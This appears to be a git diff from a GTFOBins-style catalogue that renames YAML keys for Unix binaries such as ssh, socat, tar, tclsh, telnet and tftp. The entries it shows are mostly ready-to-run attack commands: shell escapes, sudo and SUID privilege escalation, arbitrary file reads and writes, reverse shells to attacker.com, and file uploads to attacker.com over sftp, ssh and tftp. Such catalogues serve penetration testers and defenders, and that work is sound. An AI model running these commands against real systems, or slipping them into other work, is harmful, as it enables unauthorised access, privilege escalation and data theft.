||||||
---
|
---
|
||||||
|
@ -1,23 +1,23 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
HOST=user@attacker.com
|
HOST=user@attacker.com
|
||||||
sftp $HOST
|
sftp $HOST
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file to a SSH server.
|
- description: Send local file to a SSH server.
|
||||||
code: |
|
code: |
|
||||||
RHOST=user@attacker.com
|
RHOST=user@attacker.com
|
||||||
sftp $RHOST
|
sftp $RHOST
|
||||||
put file_to_send file_to_save
|
put file_to_send file_to_save
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file from a SSH server.
|
- description: Fetch a remote file from a SSH server.
|
||||||
code: |
|
code: |
|
||||||
RHOST=user@attacker.com
|
RHOST=user@attacker.com
|
||||||
sftp $RHOST
|
sftp $RHOST
|
||||||
get file_to_get file_to_save
|
get file_to_get file_to_save
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
HOST=user@attacker.com
|
HOST=user@attacker.com
|
||||||
sudo sftp $HOST
|
sudo sftp $HOST
|
||||||
|
@ -5,11 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
shuf -e DATA -o "$LFILE"
|
shuf -e DATA -o "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
./shuf -e DATA -o "$LFILE"
|
./shuf -e DATA -o "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
sudo shuf -e DATA -o "$LFILE"
|
sudo shuf -e DATA -o "$LFILE"
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
---
|
---
|
||||||
description: A valid SMB/CIFS server must be available.
|
description: A valid SMB/CIFS server must be available.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
smbclient \\ip\share
|
smbclient \\ip\share
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo smbclient \\ip\share
|
sudo smbclient \\ip\share
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,23 +1,23 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||||
bind-shell-interactive:
|
bind-shell:
|
||||||
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
|
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sort -m "$LFILE"
|
sort -m "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./sort -m "$LFILE"
|
./sort -m "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo sort -m "$LFILE"
|
sudo sort -m "$LFILE"
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: sqlite3 /dev/null '.shell /bin/sh'
|
- code: sqlite3 /dev/null '.shell /bin/sh'
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
@ -14,8 +14,8 @@ functions:
|
|||||||
.import $LFILE t
|
.import $LFILE t
|
||||||
SELECT * FROM t;
|
SELECT * FROM t;
|
||||||
EOF
|
EOF
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
|
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
|
||||||
---
|
---
|
||||||
|
@ -1,18 +1,18 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- description: Reconnecting may help bypassing restricted shells.
|
- description: Reconnecting may help bypassing restricted shells.
|
||||||
code: ssh localhost $SHELL --noprofile --norc
|
code: ssh localhost $SHELL --noprofile --norc
|
||||||
- description: Spawn interactive shell through ProxyCommand option.
|
- description: Spawn interactive shell through ProxyCommand option.
|
||||||
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file to a SSH server.
|
- description: Send local file to a SSH server.
|
||||||
code: |
|
code: |
|
||||||
HOST=user@attacker.com
|
HOST=user@attacker.com
|
||||||
RPATH=file_to_save
|
RPATH=file_to_save
|
||||||
LPATH=file_to_send
|
LPATH=file_to_send
|
||||||
ssh $HOST "cat > $RPATH" < $LPATH
|
ssh $HOST "cat > $RPATH" < $LPATH
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file from a SSH server.
|
- description: Fetch a remote file from a SSH server.
|
||||||
code: |
|
code: |
|
||||||
HOST=user@attacker.com
|
HOST=user@attacker.com
|
||||||
@ -24,7 +24,7 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
ssh -F $LFILE localhost
|
ssh -F $LFILE localhost
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: Spawn interactive root shell through ProxyCommand option.
|
- description: Spawn interactive root shell through ProxyCommand option.
|
||||||
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: stdbuf -i0 /bin/sh
|
- code: stdbuf -i0 /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./stdbuf -i0 /bin/sh -p
|
- code: ./stdbuf -i0 /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo stdbuf -i0 /bin/sh
|
- code: sudo stdbuf -i0 /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: strace -o /dev/null /bin/sh
|
- code: strace -o /dev/null /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./strace -o /dev/null /bin/sh -p
|
- code: ./strace -o /dev/null /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo strace -o /dev/null /bin/sh
|
- code: sudo strace -o /dev/null /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
tail -c1G "$LFILE"
|
tail -c1G "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./tail -c1G "$LFILE"
|
./tail -c1G "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo tail -c1G "$LFILE"
|
sudo tail -c1G "$LFILE"
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
execute-non-interactive:
|
command:
|
||||||
- description: This only works for GNU tar.
|
- description: This only works for GNU tar.
|
||||||
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
||||||
file-write:
|
file-write:
|
||||||
@ -17,8 +17,8 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: taskset 1 /bin/sh
|
- code: taskset 1 /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./taskset 1 /bin/sh -p
|
- code: ./taskset 1 /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo taskset 1 /bin/sh
|
- code: sudo taskset 1 /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,20 +1,20 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
tclsh
|
tclsh
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
reverse-shell-non-interactive:
|
non-interactive-reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
./tclsh
|
./tclsh
|
||||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo tclsh
|
sudo tclsh
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
|
@ -1,14 +1,14 @@
|
|||||||
---
|
---
|
||||||
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
|
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
|
||||||
functions:
|
functions:
|
||||||
execute-non-interactive:
|
command:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo "$COMMAND" > $TF
|
echo "$COMMAND" > $TF
|
||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
|
@ -5,11 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo DATA | ./tee -a "$LFILE"
|
echo DATA | ./tee -a "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo DATA | ./tee -a "$LFILE"
|
echo DATA | ./tee -a "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo DATA | sudo tee -a "$LFILE"
|
echo DATA | sudo tee -a "$LFILE"
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- description: BSD version only. Needs to be connected first.
|
- description: BSD version only. Needs to be connected first.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
@ -8,14 +8,14 @@ functions:
|
|||||||
telnet $RHOST $RPORT
|
telnet $RHOST $RPORT
|
||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
TF=$(mktemp -u)
|
TF=$(mktemp -u)
|
||||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: BSD version only. Needs to be connected first.
|
- description: BSD version only. Needs to be connected first.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
@ -23,7 +23,7 @@ functions:
|
|||||||
sudo telnet $RHOST $RPORT
|
sudo telnet $RHOST $RPORT
|
||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- description: BSD version only. Needs to be connected first.
|
- description: BSD version only. Needs to be connected first.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
|
@ -1,24 +1,24 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file to a TFTP server.
|
- description: Send local file to a TFTP server.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
tftp $RHOST
|
tftp $RHOST
|
||||||
put file_to_send
|
put file_to_send
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file from a TFTP server.
|
- description: Fetch a remote file from a TFTP server.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
tftp $RHOST
|
tftp $RHOST
|
||||||
get file_to_get
|
get file_to_get
|
||||||
suid-enabled:
|
suid:
|
||||||
- description: Send local file to a TFTP server.
|
- description: Send local file to a TFTP server.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
./tftp $RHOST
|
./tftp $RHOST
|
||||||
put file_to_send
|
put file_to_send
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: Send local file to a TFTP server.
|
- description: Send local file to a TFTP server.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
|
@ -1,10 +1,10 @@
|
|||||||
---
|
---
|
||||||
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
|
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: /usr/bin/time /bin/sh
|
- code: /usr/bin/time /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./time /bin/sh -p
|
- code: ./time /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo /usr/bin/time /bin/sh
|
- code: sudo /usr/bin/time /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: timeout 7d /bin/sh
|
- code: timeout 7d /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./timeout 7d /bin/sh -p
|
- code: ./timeout 7d /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo timeout --foreground 7d /bin/sh
|
- code: sudo timeout --foreground 7d /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -5,11 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
ul "$LFILE"
|
ul "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./ul "$LFILE"
|
./ul "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo ul "$LFILE"
|
sudo ul "$LFILE"
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
unexpand -t99999999 "$LFILE"
|
unexpand -t99999999 "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./unexpand -t99999999 "$LFILE"
|
./unexpand -t99999999 "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo unexpand -t99999999 "$LFILE"
|
sudo unexpand -t99999999 "$LFILE"
|
||||||
|
@ -5,11 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
uniq "$LFILE"
|
uniq "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./uniq "$LFILE"
|
./uniq "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo uniq "$LFILE"
|
sudo uniq "$LFILE"
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: unshare /bin/sh
|
- code: unshare /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./unshare -r /bin/sh
|
- code: ./unshare -r /bin/sh
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo unshare /bin/sh
|
- code: sudo unshare /bin/sh
|
||||||
---
|
---
|
||||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user